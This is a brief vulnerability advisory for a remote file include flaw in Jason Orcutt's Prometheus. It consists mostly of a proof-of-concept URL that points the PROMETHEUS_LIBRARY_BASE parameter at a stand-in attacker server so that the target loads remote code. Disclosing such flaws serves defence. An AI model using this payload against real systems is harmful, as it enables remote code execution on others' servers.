Jason Orcutt Prometheus Remote File Include Vulnerability

info
discussion
exploit
solution
references

Jason Orcutt Prometheus Remote File Include Vulnerability

The following proof of concept was provided:

http://target.server/prometheus-all/index.php?PROMETHEUS_LIBRARY_BASE=
http://attackers.server/&PHP_AUTO_LOAD_LIB=0